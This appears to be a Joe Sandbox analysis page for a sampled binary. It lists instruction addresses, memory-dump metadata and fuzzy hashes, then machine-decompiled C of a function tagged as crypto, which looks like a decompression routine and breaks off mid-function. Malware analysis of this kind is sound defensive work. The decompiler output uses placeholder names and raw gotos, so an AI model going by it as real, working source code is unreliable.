0x00a462e0
0x00a462e6
0x00a462e6
0x00a462ef
0x00a462f2
0x00000000
0x00000000
0x00a46301
0x00a46308
0x00a4690f
0x00a46911
0x00a46916
0x00a4691d
0x00a4691d
0x00a4630e
0x00a4630e
0x00a4630f
0x00a46312
0x00a46319
0x00000000
0x00000000
0x00a4631f
0x00a46327
0x00a46328
0x00a46329
0x00a4632a
0x00a46331
0x00000000
0x00a46333
0x00000000
0x00a46333
0x00a46331
0x00a46338
0x00a4633a
0x00a4633f
0x00a46341
0x00000000
0x00000000
0x00a46347
0x00a46347
0x00a46358
0x00a4635d
0x00a4639e
0x00a463a0
0x00a463a7
0x00a463ad
0x00a463b3
0x00a463ba
0x00a463ed
0x00a463ef
0x00a463f0
0x00a463f1
0x00a463f3
0x00a4640c
0x00a4640f
0x00a46416
0x00a46419
0x00a4641f
0x00a46423
0x00a4642f
0x00a4643b
0x00a4643d
0x00a46443
0x00a46445
0x00a46445
0x00a46447
0x00a4644f
0x00000000
0x00a463f5
0x00a463f8
0x00a463fb
0x00a463fb
0x00a463fb
0x00a463fd
0x00a4640a
0x00a4640a
0x00a4640a
0x00a463ff
0x00a463ff
0x00a46400
0x00a46403
0x00a46406
0x00000000
0x00a46408
0x00000000
0x00a46408
0x00a46406
0x00000000
0x00a463fb
0x00a463bc
0x00a463be
0x00a463c1
0x00a463cb
0x00a463d3
0x00a463d6
0x00a463d9
0x00a463dc
0x00a463df
0x00a463e7
0x00a46453
0x00a46453
0x00a4645b
0x00a4645d
0x00a4649d
0x00a4649d
0x00a464a3
0x00a468e6
0x00a468e6
0x00a468e8
0x00a46920
0x00a46920
0x00a46926
0x00a46aab
0x00a46aab
0x00a46aab
0x00a46ab4
0x00a46ab7
0x00a46ab9
0x00a46abd
0x00a46acc
0x00a46ace
0x00a46ad1
0x00a46ad8
0x00a46ade
0x00a46ae4
0x00a46aeb
0x00a46b1b
0x00a46b1d
0x00a46b1e
0x00a46b1f
0x00a46b21
0x00a46b3d
0x00a46b40
0x00a46b44
0x00a46b47
0x00a46b4a
0x00a46b4d
0x00a46b57
0x00a46b5d
0x00a46b69
0x00a46b6b
0x00a46b71
0x00a46b73
0x00a46b73
0x00a46b75
0x00a46b7d
0x00a46b7d
0x00a46b80
0x00a46b83
0x00a46b95
0x00a46b9a
0x00a46b9d
0x00a46b9f
0x00a46ba3
0x00a46baa
0x00a46bb3
0x00a46bb5
0x00a46bbc
0x00a46bbf
0x00a46bbf
0x00a46bc2
0x00a46bc2
0x00a46b85
0x00a46b85
0x00a46b85
0x00a46bc5
0x00a46bcc
0x00a46bd0
0x00a46bd3
0x00a46be5
0x00a46be5
0x00a46bf0
0x00a46bf2
0x00a46bf7
0x00a46bf9
0x00000000
0x00000000
0x00a46bff
0x00a46bff
0x00a46c01
0x00000000
0x00000000
0x00a46c07
0x00a46c07
0x00a46c0d
0x00a46c11
0x00a46c17
0x00a46c18
0x00a46c1b
0x00a46c1d
0x00a469fc
0x00a469fc
0x00a469ff
0x00a46a01
0x00a468a1
0x00a468a1
0x00000000
0x00a468a1
0x00a46a07
0x00a46a09
0x00a46a0c
0x00a46a0f
0x00a46a12
0x00000000
0x00000000
0x00a46a18
0x00a46a1b
0x00a46a1e
0x00a46a21
0x00a46a24
0x00000000
0x00000000
0x00a46a2a
0x00a46a2d
0x00a46a30
0x00a46a33
0x00a46a36
0x00000000
0x00000000
0x00a46a3c
0x00a46a3f
0x00a46a42
0x00a46a45
0x00a46a48
0x00000000
0x00000000
0x00a46a4e
0x00a46a51
0x00a46a54
0x00a46a57
0x00a46a5a
0x00000000
0x00000000
0x00a46a60
0x00a46a63
0x00a46a66
0x00a46a69
0x00a46a6c
0x00000000
0x00000000
0x00a46a72
0x00a46a72
0x00a46a75
0x00000000
0x00a46a75
0x00a46c23
0x00a46c23
0x00a46c25
0x00a46c6b
0x00a46c6d
0x00a46c6d
0x00a46c70
0x00a46c74
0x00a46c76
0x00a46c76
0x00a46c79
0x00a46c7e
0x00a46c83
0x00a46c84
0x00a46c86
0x00a46c88
0x00a46c8a
0x00a46c8a
0x00a46c8a
0x00a469f8
0x00a469f8
0x00000000
0x00a469f8
0x00a46c27
0x00a46c29
0x00a46c29
0x00a46c2c
0x00a46c2c
0x00a46c2e
0x00a46c30
0x00a46c36
0x00a46c3c
0x00a46c42
0x00a46c48
0x00a46c4e
0x00a46c54
0x00a46c57
0x00a46c5a
0x00a46c5c
0x00a46c5f
0x00a46c61
0x00a46c61
0x00a46c61
0x00000000
0x00a46bd5
0x00a46bd5
0x00a46bd5
0x00a46bde
0x00a46bdf
0x00a4678e
0x00a4678e
0x00a46795
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462cd
0x00a462cd
0x00000000
0x00a46c94
0x00a46c94
0x00a46c97
0x00a46c97
0x00a46c9f
0x00a46ca5
0x00a46ca5
0x00a46cab
0x00a46cad
0x00a46cb1
0x00a46cb7
0x00a46cbe
0x00a46cc0
0x00a46cc3
0x00a46cc3
0x00a46cc3
0x00a46cc8
0x00a46ccb
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462cd
0x00a462d3
0x00a462de
0x00000000
0x00a462e0
0x00a462e0
0x00000000
0x00a462e0
0x00a462de
0x00a468fb
0x00a46902
0x00a46907
0x00a46907
0x00000000
0x00a468a9
0x00a468a9
0x00a468ac
0x00a468ac
0x00a468b4
0x00a468ba
0x00a468be
0x00a468be
0x00a468c4
0x00a468c6
0x00a468ca
0x00a468d0
0x00a468d7
0x00a468d9
0x00a468dc
0x00a468dc
0x00a468dc
0x00000000
0x00a468e1
0x00a462ca
0x00a46bd3
0x00a46b23
0x00a46b29
0x00a46b2c
0x00a46b2c
0x00a46b2c
0x00a46b2e
0x00000000
0x00000000
0x00a46b30
0x00a46b30
0x00a46b31
0x00a46b34
0x00a46b37
0x00000000
0x00000000
0x00a46b39
0x00000000
0x00a46b39
0x00a46b3b
0x00a46b3b
0x00000000
0x00a46b3b
0x00a46aed
0x00a46aef
0x00a46af2
0x00a46afc
0x00a46b04
0x00a46b07
0x00a46b0a
0x00a46b0d
0x00a46b15
0x00000000
0x00000000
0x00000000
0x00000000
0x00a46abf
0x00a46abf
0x00a46ac2
0x00a46ac4
0x00a46ac7
0x00a46ac7
0x00a46ac7
0x00000000
0x00a46abf
0x00a4692c
0x00a4692c
0x00a4692f
0x00a46931
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00000000
0x00a462ca
0x00a462ca
0x00a46937
0x00a46937
0x00a4693e
0x00a46952
0x00a46952
0x00a4695d
0x00a46960
0x00a46965
0x00a46967
0x00a46969
0x00a46a7d
0x00a46a7d
0x00a46a83
0x00a46a83
0x00a46a89
0x00a46a8b
0x00a46a8f
0x00a46a95
0x00a46a9c
0x00a46a9e
0x00a46aa1
0x00a46aa1
0x00a46aa1
0x00000000
0x00a46aa6
0x00a4696f
0x00a4696f
0x00a46971
0x00000000
0x00000000
0x00a46977
0x00a46977
0x00a4697d
0x00a46981
0x00a46987
0x00a46988
0x00a4698b
0x00a4698d
0x00000000
0x00000000
0x00a4698f
0x00a4698f
0x00a46991
0x00a469d4
0x00a469d6
0x00a469d6
0x00a469d9
0x00a469dd
0x00a469df
0x00a469df
0x00a469e2
0x00a469e7
0x00a469ec
0x00a469ed
0x00a469ef
0x00a469f1
0x00a469f3
0x00a469f3
0x00a469f3
0x00000000
0x00a469df
0x00a46993
0x00a46995
0x00a46995
0x00a46998
0x00a46998
0x00a4699a
0x00a4699c
0x00a469a2
0x00a469a8
0x00a469ae
0x00a469b4
0x00a469ba
0x00a469c0
0x00a469c3
0x00a469c6
0x00a469c8
0x00a469cb
0x00a469cd
0x00a469cd
0x00a469cd
0x00000000
0x00a469d2
0x00a46940
0x00a46940
0x00a46949
0x00a4694a
0x00000000
0x00a4694a
0x00a468ea
0x00a468f0
0x00a468f2
0x00a468f7
0x00a468f9
0x00000000
0x00000000
0x00000000
0x00a468f9
0x00a464a9
0x00a464a9
0x00a464af
0x00a464b2
0x00a464c8
0x00a464cb
0x00a464d1
0x00a464d4
0x00a464d6
0x00a464da
0x00a464df
0x00a464e5
0x00a464f0
0x00a464f7
0x00a464f9
0x00a464f9
0x00a464fc
0x00a46500
0x00a46503
0x00a46503
0x00a464b4
0x00a464b4
0x00a464b8
0x00a464b8
0x00a46508
0x00a4650f
0x00a46515
0x00a4651b
0x00a46522
0x00a46561
0x00a46563
0x00a46564
0x00a46565
0x00a46567
0x00a46583
0x00a46586
0x00a4658a
0x00a4658d
0x00a46593
0x00a4659d
0x00a465a0
0x00a465a6
0x00a465a9
0x00a465b6
0x00a465b8
0x00a465be
0x00a465c0
0x00a465c0
0x00a465c2
0x00000000
0x00a465c2
0x00a46569
0x00a4656f
0x00a46572
0x00a46572
0x00a46572
0x00a46574
0x00000000
0x00000000
0x00a46576
0x00a46576
0x00a46577
0x00a4657a
0x00a4657d
0x00000000
0x00000000
0x00a4657f
0x00000000
0x00a4657f
0x00a46581
0x00a46581
0x00000000
0x00a46524
0x00a46524
0x00a46526
0x00a46529
0x00a4652b
0x00a46537
0x00a4653e
0x00a46542
0x00a46545
0x00a46549
0x00a46550
0x00a46553
0x00a46557
0x00a465ca
0x00a465ca
0x00a465cd
0x00a465d0
0x00a465da
0x00a465e4
0x00a465e9
0x00a465ea
0x00a465ee
0x00a465f0
0x00a465f4
0x00a465f6
0x00a46744
0x00a46744
0x00a46747
0x00a46747
0x00a4674d
0x00a4674f
0x00a46750
0x00a46756
0x00a46758
0x00a46759
0x00a4675f
0x00a46761
0x00a46761
0x00a46761
0x00a4675f
0x00a46756
0x00a46765
0x00a4676b
0x00a46771
0x00a46774
0x00a46777
0x00a4677e
0x00a46781
0x00a4679f
0x00a4679f
0x00a467aa
0x00a467ac
0x00a467b1
0x00a467b5
0x00a467b7
0x00000000
0x00000000
0x00a467bd
0x00a467bd
0x00a467bf
0x00000000
0x00000000
0x00a467c5
0x00a467c5
0x00a467cd
0x00a467d0
0x00a467d6
0x00a467d7
0x00a467da
0x00a467dc
0x00a467de
0x00a46856
0x00a46856
0x00a46858
0x00a4685c
0x00a4685f
0x00a46862
0x00a46867
0x00a4686a
0x00a4686d
0x00a46872
0x00a46875
0x00a46878
0x00a4687d
0x00a46880
0x00a46883
0x00a46888
0x00a4688b
0x00a4688e
0x00a46893
0x00a46896
0x00a46899
0x00a4689e
0x00a4689e
0x00a46899
0x00a4688e
0x00a46883
0x00a46878
0x00a4686d
0x00a46862
0x00000000
0x00a46858
0x00a467e0
0x00a467e0
0x00a467e4
0x00a4682a
0x00a4682c
0x00a4682c
0x00a4682f
0x00a46833
0x00a46835
0x00a46835
0x00a46838
0x00a4683d
0x00a46842
0x00a46843
0x00a46845
0x00a46847
0x00a46849
0x00a46849
0x00a46849
0x00a4684e
0x00a46852
0x00000000
0x00a46852
0x00a467e6
0x00a467e8
0x00a467e8
0x00a467eb
0x00a467eb
0x00a467ed
0x00a467ef
0x00a467f5
0x00a467fb
0x00a46801
0x00a46807
0x00a4680d
0x00a46813
0x00a46816
0x00a46819
0x00a4681b
0x00a4681e
0x00a46820
0x00a46820
0x00a46820
0x00a46825
0x00000000
0x00a46783
0x00a46783
0x00a46783
0x00a4678c
0x00a4678d
0x00000000
0x00a4678d
0x00a46781
0x00a465fc
0x00a465fc
0x00a465ff
0x00a4670e
0x00a46711
0x00a4671a
0x00a46723
0x00a46727
0x00a4672b
0x00a46732
0x00a4673c
0x00a4673f
0x00000000
0x00a4673f
0x00a46605
0x00a46605
0x00a46649
0x00a46607
0x00a4660a
0x00a46617
0x00a46626
0x00a4662a
0x00a4662e
0x00a46634
0x00a46636
0x00a46639
0x00a4663d
0x00a46640
0x00a46644
0x00a46644
0x00a4664e
0x00a46655
0x00a4665b
0x00a46661
0x00a46668
0x00a46699
0x00a4669b
0x00a4669c
0x00a4669d
0x00a466a1
0x00a466a3
0x00a466c1
0x00a466c4
0x00a466d0
0x00a466d3
0x00a466d7
0x00a466dc
0x00a466ef
0x00a466f1
0x00a466f7
0x00a466f9
0x00a466f9
0x00a466fb
0x00000000
0x00a466fb
0x00a466a5
0x00a466ab
0x00a466ae
0x00a466ae
0x00a466ae
0x00a466b0
0x00000000
0x00000000
0x00a466b2
0x00a466b2
0x00a466b3
0x00a466b6
0x00a466b9
0x00000000
0x00000000
0x00a466bb
0x00000000
0x00a466bb
0x00a466bd
0x00a466bd
0x00000000
0x00a4666a
0x00a4666a
0x00a4666c
0x00a4666f
0x00a46679
0x00a46689
0x00a4668c
0x00a4668f
0x00a46703
0x00a46706
0x00a46706
0x00a46708
0x00a46708
0x00000000
0x00a46708
0x00a46668
0x00a465d2
0x00a465d2
0x00000000
0x00a465d2
0x00a46522
0x00a4645f
0x00a4645f
0x00a46466
0x00a46490
0x00a46493
0x00a46496
0x00000000
0x00a46468
0x00a46475
0x00a46480
0x00000000
0x00a46480
0x00a46466
0x00a463ba
0x00a4635f
0x00a4635f
0x00a46362
0x00000000
0x00000000
0x00a46364
0x00a46366
0x00a4636b
0x00a46371
0x00a46377
0x00000000
0x00000000
0x00a4637d
0x00a4637d
0x00a46391
0x00a46391
0x00a46398
0x00a46cd0
0x00a46cd0
0x00000000
0x00a46cd0
0x00000000
0x00a46398
0x00a4637f
0x00a4637f
0x00a46385
0x00a4638b
0x00000000
0x00000000
0x00000000
0x00a4638b
0x00a462cd

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 2af6d32872a6741a31f4e9e2c86263b89f32d3f640a0142d3adddfe269bc06a9
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: F262D7756047849FCB25CF28C5906B9BBE1AFD6304F08C96EE8DA8B346D734E945CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A477EF Relevance: .8, Instructions: 817
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00A477EF(signed int __ecx) {
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				void* _t385;
				signed int _t388;
				signed int _t389;
				intOrPtr _t391;
				signed int _t401;
				char _t410;
				unsigned int _t411;
				void* _t421;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t428;
				char _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int* _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				void* _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t466;
				signed int _t469;
				char _t478;
				unsigned int _t479;
				signed int* _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t491;
				signed int _t492;
				signed short _t493;
				unsigned int _t499;
				signed int _t500;
				signed int* _t506;
				unsigned int _t507;
				intOrPtr _t520;
				intOrPtr* _t521;
				intOrPtr _t523;
				signed int* _t524;
				signed int _t525;
				intOrPtr _t526;
				signed int _t528;
				void* _t529;
				signed int _t532;
				signed int* _t534;
				unsigned int _t537;
				signed int _t538;
				void* _t539;
				signed int _t542;
				signed int _t544;
				signed int _t547;
				void* _t549;
				unsigned int _t552;
				signed int _t553;
				intOrPtr* _t555;
				void* _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t564;
				signed int* _t569;
				void* _t570;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t582;
				unsigned int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				void* _t592;
				signed int _t595;
				intOrPtr* _t597;
				void* _t598;
				signed int _t601;
				void* _t604;
				signed int _t607;
				signed int _t608;
				intOrPtr* _t610;
				void* _t611;
				signed int _t614;
				signed int _t615;
				void* _t617;
				signed int _t620;
				intOrPtr* _t623;
				void* _t624;
				signed int _t628;
				unsigned int _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				unsigned int _t637;
				signed int _t640;
				void* _t643;
				signed int* _t644;
				signed int _t645;
				signed int _t646;
				void* _t649;
				unsigned int _t651;
				signed int _t654;
				signed int _t658;
				void* _t661;
				signed int* _t662;
				unsigned int _t664;
				signed int _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				intOrPtr* _t672;
				signed int _t673;
				signed int* _t674;
				signed int _t676;
				signed int _t677;
				unsigned int _t681;
				signed int _t682;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int* _t690;
				signed int* _t691;
				signed int* _t692;
				signed int _t694;
				unsigned int _t696;
				signed int _t697;
				signed int _t698;
				signed int* _t699;
				signed int _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				char* _t710;
				signed int _t711;
				unsigned int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t723;
				signed int _t724;
				void* _t725;

				_t520 =  *((intOrPtr*)(_t725 + 0x40));
				_t686 = __ecx;
				_t692 = _t520 + 4;
				 *(_t725 + 0x24) = __ecx;
				_t672 = _t520 + 0x18;
				 *(_t725 + 0x10) = _t692;
				if( *((char*)(_t520 + 0x2c)) != 0) {
					 *(_t725 + 0x10) = _t692;
					L4:
					_t523 =  *_t672;
					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
						 *(_t725 + 0x18) = _t363;
						 *(_t725 + 0x14) = _t694;
						 *(_t725 + 0x2c) = _t363;
						__eflags = _t363 - _t694;
						if(_t363 >= _t694) {
							 *(_t725 + 0x2c) = _t694;
						}
						_t524 =  *(_t725 + 0x10);
						while(1) {
							_t673 =  *(_t686 + 0xe6dc);
							_t628 =  *(_t686 + 0x7c) & _t673;
							 *(_t686 + 0x7c) = _t628;
							_t525 =  *_t524;
							__eflags = _t525 -  *(_t725 + 0x2c);
							if(_t525 <  *(_t725 + 0x2c)) {
								goto L19;
							}
							L13:
							__eflags = _t525 - _t363;
							if(__eflags > 0) {
								L145:
								return 1;
							}
							if(__eflags != 0) {
								L16:
								__eflags = _t525 - _t705;
								if(_t525 < _t705) {
									L18:
									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
										L144:
										 *((char*)(_t520 + 0x4ad3)) = 1;
										goto L145;
									}
									goto L19;
								}
								__eflags =  *((char*)(_t520 + 0x4ad2));
								if( *((char*)(_t520 + 0x4ad2)) == 0) {
									goto L144;
								}
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
								goto L145;
							}
							goto L16;
							L19:
							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
							__eflags = (_t526 - _t628 & _t673) - 0x1004;
							if((_t526 - _t628 & _t673) >= 0x1004) {
								L24:
								_t674 =  *(_t725 + 0x10);
								_t367 = E00A3A89D(_t674);
								_t368 =  *(_t520 + 0xb4);
								_t630 = _t367 & 0x0000fffe;
								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
									_t528 = 0xf;
									_t369 = _t368 + 1;
									 *(_t725 + 0x28) = _t528;
									__eflags = _t369 - _t528;
									if(_t369 >= _t528) {
										L32:
										_t696 = _t674[1] + _t528;
										_t697 = _t696 & 0x00000007;
										 *_t674 =  *_t674 + (_t696 >> 3);
										 *(_t725 + 0x1c) =  *_t674;
										_t373 =  *(_t725 + 0x28);
										_t674[1] = _t697;
										_t529 = 0x10;
										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
										asm("sbb eax, eax");
										_t374 = _t373 & _t532;
										__eflags = _t374;
										_t524 =  *(_t725 + 0x10);
										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
										_t375 =  *(_t725 + 0x1c);
										L33:
										_t634 = _t633 & 0x0000ffff;
										__eflags = _t634 - 0x100;
										if(_t634 >= 0x100) {
											__eflags = _t634 - 0x106;
											if(_t634 < 0x106) {
												__eflags = _t634 - 0x100;
												if(_t634 != 0x100) {
													__eflags = _t634 - 0x101;
													if(_t634 != 0x101) {
														_t635 = _t634 + 0xfffffefe;
														__eflags = _t635;
														_t534 = _t686 + (_t635 + 0x18) * 4;
														_t698 =  *_t534;
														 *(_t725 + 0x28) = _t698;
														if(_t635 == 0) {
															L117:
															 *(_t686 + 0x60) = _t698;
															_t699 =  *(_t725 + 0x10);
															_t376 = E00A3A89D(_t699);
															_t377 =  *(_t520 + 0x2d78);
															_t637 = _t376 & 0x0000fffe;
															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
																_t676 = 0xf;
																_t378 = _t377 + 1;
																__eflags = _t378 - _t676;
																if(_t378 >= _t676) {
																	L125:
																	_t537 = _t699[1] + _t676;
																	_t538 = _t537 & 0x00000007;
																	_t699[1] = _t538;
																	 *_t699 =  *_t699 + (_t537 >> 3);
																	_t381 =  *_t699;
																	 *(_t725 + 0x34) = _t538;
																	_t539 = 0x10;
																	 *(_t725 + 0x30) = _t381;
																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t382 = _t381 & _t542;
																	__eflags = _t382;
																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
																	L126:
																	_t677 = _t383 & 0x0000ffff;
																	__eflags = _t677 - 8;
																	if(_t677 >= 8) {
																		_t702 = (_t677 >> 2) - 1;
																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
																		__eflags = _t702;
																		if(_t702 != 0) {
																			_t411 = E00A3A89D( *(_t725 + 0x10));
																			_t644 =  *(_t725 + 0x10);
																			_t549 = 0x10;
																			_t681 = _t681 + (_t411 >> _t549 - _t702);
																			_t552 =  *(_t725 + 0x34) + _t702;
																			_t553 = _t552 & 0x00000007;
																			__eflags = _t553;
																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
																			_t644[1] = _t553;
																		}
																	} else {
																		_t681 = _t677 + 2;
																	}
																	_t640 =  *(_t686 + 0x7c);
																	_t544 =  *(_t725 + 0x28);
																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	_t704 = _t640 - _t544;
																	 *(_t686 + 0x74) = _t681;
																	__eflags = _t704 - _t385;
																	if(_t704 >= _t385) {
																		L140:
																		_t524 =  *(_t725 + 0x10);
																		_t363 =  *(_t725 + 0x18);
																		__eflags = _t681;
																		if(_t681 == 0) {
																			goto L11;
																		}
																		_t388 =  *(_t686 + 0xe6dc);
																		do {
																			_t389 = _t388 & _t704;
																			_t704 = _t704 + 1;
																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
																			_t388 =  *(_t686 + 0xe6dc);
																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
																			 *(_t686 + 0x7c) = _t640;
																			_t681 = _t681 - 1;
																			__eflags = _t681;
																		} while (_t681 != 0);
																		goto L35;
																	} else {
																		__eflags = _t640 - _t385;
																		if(_t640 >= _t385) {
																			goto L140;
																		}
																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t521 = _t391 + _t704;
																		_t710 = _t391 + _t640;
																		_t643 = 8;
																		 *(_t686 + 0x7c) = _t640 + _t681;
																		__eflags = _t681 - _t643;
																		if(_t681 < _t643) {
																			L84:
																			_t363 =  *(_t725 + 0x18);
																			_t524 =  *(_t725 + 0x10);
																			__eflags = _t681;
																			if(_t681 == 0) {
																				L10:
																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																				L11:
																				_t705 =  *(_t725 + 0x14);
																				continue;
																				do {
																					do {
																						_t673 =  *(_t686 + 0xe6dc);
																						_t628 =  *(_t686 + 0x7c) & _t673;
																						 *(_t686 + 0x7c) = _t628;
																						_t525 =  *_t524;
																						__eflags = _t525 -  *(_t725 + 0x2c);
																						if(_t525 <  *(_t725 + 0x2c)) {
																							goto L19;
																						}
																						goto L13;
																					} while (_t681 == 0);
																					_t646 =  *(_t686 + 0x7c);
																					_t561 =  *(_t686 + 0x60);
																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																					_t709 = _t646 - _t561;
																					__eflags = _t709 - _t421;
																					if(_t709 >= _t421) {
																						L112:
																						_t422 =  *(_t686 + 0xe6dc);
																						do {
																							_t423 = _t422 & _t709;
																							_t709 = _t709 + 1;
																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
																							_t422 =  *(_t686 + 0xe6dc);
																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
																							 *(_t686 + 0x7c) = _t646;
																							_t681 = _t681 - 1;
																							__eflags = _t681;
																						} while (_t681 != 0);
																						L35:
																						_t524 =  *(_t725 + 0x10);
																						_t363 =  *(_t725 + 0x18);
																						goto L11;
																					}
																					__eflags = _t646 - _t421;
																					if(_t646 >= _t421) {
																						goto L112;
																					}
																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
																					_t521 = _t425 + _t709;
																					_t710 = _t425 + _t646;
																					_t649 = 8;
																					 *(_t686 + 0x7c) = _t646 + _t681;
																					__eflags = _t681 - _t649;
																					if(_t681 < _t649) {
																						goto L84;
																					}
																					__eflags = _t561 - _t681;
																					if(_t561 >= _t681) {
																						_t428 = _t681 >> 3;
																						__eflags = _t428;
																						 *(_t725 + 0x34) = _t428;
																						_t688 = _t428;
																						do {
																							E00A50320(_t710, _t521, _t649);
																							_t725 = _t725 + 0xc;
																							_t649 = 8;
																							_t521 = _t521 + _t649;
																							_t710 = _t710 + _t649;
																							_t681 = _t681 - _t649;
																							_t688 = _t688 - 1;
																							__eflags = _t688;
																						} while (_t688 != 0);
																						L83:
																						_t686 =  *(_t725 + 0x24);
																						goto L84;
																					}
																					_t564 = _t681 >> 3;
																					__eflags = _t564;
																					do {
																						_t681 = _t681 - _t649;
																						 *_t710 =  *_t521;
																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																						_t437 =  *((intOrPtr*)(_t521 + 7));
																						_t521 = _t521 + _t649;
																						 *((char*)(_t710 + 7)) = _t437;
																						_t710 = _t710 + _t649;
																						_t564 = _t564 - 1;
																						__eflags = _t564;
																					} while (_t564 != 0);
																					goto L84;
																					L92:
																					_t524 =  *(_t725 + 0x10);
																					_t705 =  *(_t725 + 0x14);
																					_t363 =  *(_t725 + 0x18);
																					__eflags = _t681;
																				} while (_t681 == 0);
																				_t463 =  *(_t686 + 0xe6dc);
																				_t716 =  *(_t725 + 0x34);
																				do {
																					_t464 = _t463 & _t716;
																					_t716 = _t716 + 1;
																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
																					_t463 =  *(_t686 + 0xe6dc);
																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
																					 *(_t686 + 0x7c) = _t658;
																					_t681 = _t681 - 1;
																					__eflags = _t681;
																				} while (_t681 != 0);
																				goto L35;
																			}
																			 *_t710 =  *_t521;
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 1;
																			if(_t681 <= 1) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			_t363 =  *(_t725 + 0x18);
